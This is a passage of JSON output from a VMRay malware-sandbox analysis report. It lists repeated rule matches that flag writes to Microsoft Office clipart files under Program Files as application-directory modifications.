"built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34320", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34327", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34336", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34345", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34360", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34369", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34378", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34387", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101860.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34396", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101861.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34405", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34414", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34423", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34432", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34441", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34450", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34459", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101980.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34466", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102002.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34473", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102762.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34482", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102762.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34489", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103058.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34498", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103058.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103262.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34507", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103262.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103402.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34514", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103402.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34525", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34532", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105230.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34541", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105230.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34548", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34555", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34562", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105238.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105240.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34571", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105240.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34578", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34585", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": 